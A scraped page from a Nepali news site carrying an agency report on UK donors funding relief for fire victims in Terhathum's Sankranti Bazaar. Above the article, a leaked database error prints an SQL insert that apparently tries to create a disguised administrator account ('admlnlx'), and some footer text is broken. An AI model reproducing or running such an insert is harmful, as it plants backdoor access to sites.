WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bzf5QCKRg8mC1Y2Zvdh9uS6bUtEdNP/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 12:20:07', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
अग्निपीडितलाई बेलायतबाट सहयोग – Gaule Khabar

अग्निपीडितलाई बेलायतबाट सहयोग

अग्निपीडितलाई बेलायतबाट सहयोग

तेह्रथुम,माघ ७ –

तेह्रथुमको आठराइ सङ्क्रान्ति बजारमा गत पुस १ गते भएको भीषण आगलागीका पीडित परिवारलाई शुक्रबार इङनाम इवाहाङ बन्धु समिति तथा चेलीबेटी समाज बेलायतबाट सहयोग रकम उपलब्ध भएको छ ।

समाजका अध्यक्ष शेरबहादुर इङनामले ‘सङ्क्रान्ति बजार पुनःनिर्माण तथा पुनःस्थापना कोष’मा रु दुई लाख ७४ हजार ५६७ उपलब्ध गराइएको जानकारी दिनुभयो ।

बेलायत निवासी प्रवासी इङनाम इवाहाङ बन्धुबाट राहतस्वरुप सहयोग रकम सङ्कलन गरेर प्रदान गरिएको अध्यक्ष इङनामले बताउनुभयो । अग्निपीडितका लागि कोषमा रकम जम्मा हुने क्रम चलिरहेको छ ।

गत पुस १ गते भएको आगलागीमा सङ्क्रान्ति बजारका २९ घर र तीनवटा टहरा जलेका थिए । आगलागीबाट ७३ परिवार विस्थापित भएका थिए भने रु १४ करोड आठ लाख बराबरको क्षति भएको थियो ।- रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका